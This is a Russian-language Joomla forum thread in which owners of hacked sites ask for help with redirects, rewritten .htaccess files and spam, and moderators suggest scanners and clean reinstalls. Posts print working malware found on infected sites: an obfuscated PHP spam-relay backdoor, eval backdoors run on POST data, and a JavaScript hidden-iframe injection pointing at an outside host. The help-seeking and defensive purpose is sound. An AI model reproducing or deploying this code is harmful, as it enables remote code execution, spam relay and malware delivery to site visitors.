Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 275495 Просмотров
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
.htaccess -  с точкой вначале есть файл?

если это он - тогда заражены уже сами файлы на сайте... тут уже повеселее ситуация, без ssh и знания команд - будет довольно сложно вычиститься

А ведь верно, я не тот файл смотрел =(
Вот содержание файла "с точкой"
Спойлер
[свернуть]
*

artlux

  • Захожу иногда
  • 466
  • 58 / 0
вписывай туда все что в том что первый раз скидывал
Разработка расширений: Joomla 1.5+, Bitrix 12+, Мобильные приложения для сайтов под Android (PhoneGap).
Для бонусов: Z136221252622, R242724126443, U423945028202. +79211696184(Мегафон), или плюсик в репу!
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
вписывай туда все что в том что первый раз скидывал
Когда сохраняю, открываю сайт - он грузится не полностью, а когда обновляю - опять происходит редирект и файл htaccess оказывается снова в старом виде
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Когда сохраняю, открываю сайт - он грузится не полностью, а когда обновляю - опять происходит редирект и файл htaccess оказывается снова в старом виде
необходимо найти shell, найти и устранить причину его попадания, найти если есть скрипт перезаписи(есть он или нет видно по обращению к найденному shell, это посмотреть можно смотреть в acceslog, если в момент перезаписи идет обращение к shell значит перезаписывается через него, если нет обращений то искать скрипт) скрипт выглядеть может по разному, не спрашивайте как в каждом конкретном случае имя файла и код может быть абсолютно разным
ну и только потом чистить файлы, в противном случае это бесполезно
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Вот логи при заходе с мобильного устройства:
Спойлер
[свернуть]

Как я понимаю в одном из этих файлов скрипт, перезаписывающий мой .htaccess? Возможно ли найти в одном из них в тексте название перезаписываемого файла "htaccess" и удалить эту строку?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
после чистки кода

eval(base64_decode("DQp***p9"));

Сайт стал вообще недоступен. В чем может быть причина?
Файлы побились.  Перезалей  файлы Joomla.
lord_sot
Сканер запускал на сайте ?
« Последнее редактирование: 03.02.2013, 18:52:22 от draff »
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Файлы побились.  Перезалей  файлы Joomla.
lord_sot
Сканер запускал на сайте ?
Осваиваю SSH и пытаюсь с его помощью запустить ai-bolit.php
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
При попытке запуска вышеописанного скрипта пишется следующее:
Спойлер
[свернуть]
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Осваиваю SSH и пытаюсь с его помощью запустить ai-bolit.php

Не советую айболит- потеряешься. Сначала попробуй сканер - fls.php
http://site-security.ru/dokumentacziya.html
*

artlux

  • Захожу иногда
  • 466
  • 58 / 0
Код
Не советую айболит- потеряешься. Сначала попробуй сканер - fls.php

сейчас в комплекте идет список игнорируемых сигнатур... Вполне приятно стало айболит запускать...
Единственно енепонятно почему не получилось его запустить...

Код
При попытке запуска вышеописанного скрипта пишется следующее:
посмотри доки - может не туда закинул файлы (там не папку копировать надо, а нужные файлы кидать в корень сайта)
Разработка расширений: Joomla 1.5+, Bitrix 12+, Мобильные приложения для сайтов под Android (PhoneGap).
Для бонусов: Z136221252622, R242724126443, U423945028202. +79211696184(Мегафон), или плюсик в репу!
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
При использовании fls.php
Спойлер
[свернуть]

Что касается айболита - закинул скрипт в корень сайта без папок.

В документации работа fls выглядит иначе...
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Айболит выполнился. Не очень только понятно - он показывает строки которые необходимо удалить?
*

artlux

  • Захожу иногда
  • 466
  • 58 / 0
нет он показывает отчет... вначале наиболее критичные моменты...

В отчете указываются подозрительные строки...
основное внимание стоит уделить найденым шелл-сигнатурам (если имеются)
По остальному fls.php вроди показал что все чисто
Разработка расширений: Joomla 1.5+, Bitrix 12+, Мобильные приложения для сайтов под Android (PhoneGap).
Для бонусов: Z136221252622, R242724126443, U423945028202. +79211696184(Мегафон), или плюсик в репу!
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
При использовании fls.php
Undefined variable: E in /var/www/mitusov/data/www/cleanok.spb.ru/fls.php(4) : eval()'d code(107) : eval()'d code on line 38
В документации работа fls выглядит иначе...
Попробуй старую версию сканера. А то ошибка светит, а скрипт в новом сканере закодирован.
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Попробуй старую версию сканера. А то ошибка светит, а скрипт в новом сканере закодирован.
Так старой версией и пользовался. Новая то платная.
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Это просто жесть. Там файлов около тысячи - как их все отредактировать?
Спойлер
[свернуть]
*

site-optimizator

  • Осваиваюсь на форуме
  • 25
  • 0 / 0
на хосте распаковал дистрибутив Joomla 1.5.26 поверх старых файлов с их перезаписью
Дай тебе Б-г здоровья, добрый человек.
Накатил свежий дистриб поверху - и лишние паги как корова языком слизнула.
Побегу в соседние ветки читать про обеспечение безопасности, пока меня по новой не подломили.
PS: кстати, что касается айболита: зашёл по SSH, запустил скрипт, сканирование вроде какое-то началось, но никакого рапорта в корне не было. Ждал минут 40 - нифига. Сколько он вообще должен работать?
*

Alukard

  • Захожу иногда
  • 101
  • 1 / 0
Вот нашёл в одном из php файлов такой код
Спойлер
[свернуть]
До этого были проблемы с редиректом. сдаётся мне это с тех времён осталось?
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Решил одну проблему - получил другую. Удалил из всех файлов сайта строки с кодом base64_decode и теперь когда заходишь в админ-панель (вводишь логин и пароль и нажимаешь Login) переходит по ссылке http://cleanok.spb.ru/administrator/aW5kZXgucGhw с ошибкой 404. Если удалить из адресной строки левый код то заходит нормально...
Но редиректа больше не наблюдается.
*

bodi_90

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Всем добрый день!
Сегодня обнаружил что мой сайт повязал кандалами Яндекс и считает его вирусным.
Начиная копаться в чем дело, обнаружил, что функционал редактора JCE не отображается в материалах.
А так же на главной страничке в коде было следущее:
  
Спойлер
[свернуть]
Хотел было просто удалить код. Но после редактирования материала, он не сохраняется.
Посоветуйте как быть?
« Последнее редактирование: 09.02.2013, 13:24:40 от flyingspook »
*

anthophyta

  • Захожу иногда
  • 293
  • 1 / 0
sec-w.com постоянно взламывает мой сайт.... - т.е. все логины пользователей становятся "sec-w.com" - или "ed"  и прочее...
« Последнее редактирование: 19.02.2013, 21:46:49 от flyingspook »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
sec-w.com постоянно взламывает мой сайт.... - т.е. все логины пользователей становятся "sec-w.com" - или "ed"  и прочее...
версия движка, что стоит дополнительно, что предпринимали
*

anthophyta

  • Захожу иногда
  • 293
  • 1 / 0
Joomla 2.5.9
компоненты k2? sobi pro и еще много компонентов и модулей...
на вирусы сканировал, на шел и бэкдоры проверяли...
ничего не нашли....
*

anthophyta

  • Захожу иногда
  • 293
  • 1 / 0
версия движка, что стоит дополнительно, что предпринимали
я не один такой здесь описано подробней: http://joomlaforum.ru/index.php/topic,239013.new.html#new
*

flier

  • Захожу иногда
  • 107
  • 2 / 2
Создается файл dirs.php и рассылает спам! Нужна консультация!

Постоянно создается файл dirs.php в "/components/com_jcomments/dirs.php" и рассылает спам, из-за этого хостер постоянно блокирует отправку писем с сайта через скрипты.
Удаляю файл - появляется через время опять сам..
код в файле был в одну строку - для понятности после ";" перенес на новые строки..

Вопрос к знающим людям - как избавиться от появления этого файла, и что можно понять из самого кода..

ниже код файла
Код
<?php
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321));
} $v5031e998 = false;
foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a;
break;
case chr(100):
$v8d777f38 = $v3c6e0b8a; break;
case chr(109):
$v3d26b0b1 = $v3c6e0b8a; break;
case chr(101);
$v5031e998 = true; break;
} } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998];
$v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1];
if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203);
$v8d777f38 = n9a2d8ce3($v8d777f38);
$v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
} $v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38));
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
if (strpos($v01b6e203, ';', 1)!= false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
$va3da707b = ucfirst($va3da707b);
$vbfbb12dc = ucfirst($vbfbb12dc);
$v3a5939e4 = next(explode('@', $v081bde0c));
if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = '';
$v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
} } else { $vbfbb12dc = $va3da707b = '';
$v081bde0c = strtolower($v01b6e203);
$v3a5939e4 = next(explode('@', $v01b6e203));
} preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
$vee11cbb1 = $vee11cbb1[1];
preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
$vb068931c = $vb068931c[1];
preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
$vc34487c9 = $vc34487c9[1];
preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
$v6f4b5f42= $v6f4b5f42[1];
$vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
$vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
$v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
$v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
$v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false;
else $v10497e3f = true;
$v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n";
$vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
$v3c87b187 = "X-Priority: 3 (Normal)\r\n";
$v3c87b187 .= "MIME-Version: 1.0\r\n";
$v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
$v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0");
} } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f;
$v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n";
$v4340fd73 .= "To: $v01b6e203\r\n";
$v4340fd73 .= "Subject: $vc34487c9\r\n";
$v4340fd73 .= $v3c87b187;
$v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42;
if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4);
if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { die(chr(79).chr(75).md5(1234567890)."+1");
} else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417";
} function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
} function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0);
$vb4a88417 = '';
for($v865c0c0b = 0;
$v865c0c0b < $vf5a8e923;
$v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f;
$vb4a88417 .= $v7fa1b685;
} $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0);
$v11a95b8a = 0; continue;
} $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
$v11a95b8a += 3;
continue;
} $vb4a88417 .= chr($v4a8a08f0);
$v11a95b8a++;
} return $vb4a88417;
} function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20);
else return -1; if (!$v66b18866) { return 1;
} else { $v8d777f38 = n54070395($v66b18866);
@fputs($v66b18866, "EHLO $v0897acf4\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3)!= 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3)!= 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3)!= 250 && substr($ve98d2f00, 0, 3)!= 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "DATA\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3)!= 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, $v841a2d68."\r\n.\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3)!= 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "QUIT\r\n");
@fclose($v66b18866); return 0;
} } function n54070395($v66b18866) { $v8d777f38 = '';
while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38;
} function n9c812bad($vad5f82e8) { global $v619d75f8;
if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
if (count($v744fa43b) === 0) return '127.0.0.1';
$v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
return $v744fa43b[$v865c0c0b[0]];
} else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec);
$vc68271a6 = '';
for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec);
$v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>


так же было много файлов с ифреймами..
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Пишет пользователь tkav в теме
http://joomlaforum.ru/index.php/topic,253616.0.html

обсуждение переносим сюда

Цитировать
Короче началось с того, что Касперский начал ругаться при просмотре сайта.
При анализе выяснилось, что все папки с доменами-сайтами заржены. Зараза каключается в добавлении ко ВСЕМ *.js дописки вида
Код
;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://rsdlfyrn.lflinkup.net/e8ddc4f1.3HIcyxr?default"></iframe>');
при восстановлении чистых файлов с дистрибутива, практически сразу этот код появляется опять. Дата изменения файлов при этом не меняется.
Также были обнаружены файлы с разными названиями типа
.e9gwpz.php
.bhuzih.php
и т.п.  (конечно всё, что нашел, удалил)
их содержимое такое:
Код
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Также встретил подозрительный файл j.php :
Код
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

194.242.59.43 FALSE /about/ FALSE 0 <?eval(stripslashes(array_pop($_POST)))?> 1

А также ещё несколько подозрительных, которые подлиннее, начинаются они так:
Код
<?php
/**
* @version $Id: framework.php 22381 2011-11-14 01:18:53Z dextercowley $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// no direct access
class JToolBarHelper
{

/**
* Title cell
* For the title and toolbar to be rendered correctly,
* this title fucntion must be called before the starttable function and the toolbars icons
* this is due to the nature of how the CSS has been used to postion the title in respect to the toolbar
* @param string The title
* @param string The name of the image
* @since 1.5
*/
function title($title, $icon = 'generic.png')
{.....

Подскажите, как вылечить заразу и найти уязвимость...
Время изменения файлов не фиксируется, так что и логи затруднительно посмотреть. Обращения извне во время возобновления заражения файлов не происходит. Заражаются даже те сайты(папки), домены которых не существуют, т.е. скрипт тупо сканирует все папки аккаунта...
Хостинг jino.ru ; Joomla 1.5.26 и иногда 1.5.23 (всего штук 20 сайтов)

Для пробы перенес несколько сайтов на другой хостинг (sweb.ru) - вручную вроде всё вычистил при этом - но они тоже заразились через неделю.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
@flier
ищите shell, и скрипты которые перезаписывают, смотрите логи
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
@anthophyta
написал вашему супорту на хостинг
сами тоже напишите и кто хостится на risp.ru пишите им
мое мнение что у них сервак(как только ftp или полностью не важно) угнали и может не один
*

flier

  • Захожу иногда
  • 107
  • 2 / 2
@flier
ищите shell, и скрипты которые перезаписывают, смотрите логи
ищу 3й день уже, по логам видно, что идет прямое обращение к "/components/com_jcomments/dirs.php" с разный IP всего мира.
Файл удалил - но так же по логом видно, что идет с разных айпи прямое обращение к нему..
пример из лого:
Код
in-ma****.ru 151.42.153.114 - - [10/Feb/2013:19:56:41 +0400] "POST /components/com_jcomments/dirs.php HTTP/1.0" 500 1976 "-" "Mozilla/5.0" 0
in-ma****.ru 2.137.215.250 - - [10/Feb/2013:19:59:12 +0400] "POST /components/com_jcomments/dirs.php HTTP/1.0" 500 1976 "-" "Mozilla/5.0" 0
in-ma****.ru 79.168.129.224 - - [10/Feb/2013:20:00:25 +0400] "POST /components/com_jcomments/dirs.php HTTP/1.0" 500 1976 "-" "Mozilla/5.0" 0
Обращение идет давольно часто..
Куда рыть уже и не знаю - зашел в тупик..
@flyingspook - посоветуйте...
Спсибо!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 495
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 63293
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 1036
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 3026
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1822
Последний ответ 22.02.2022, 11:38:15
от AlexP750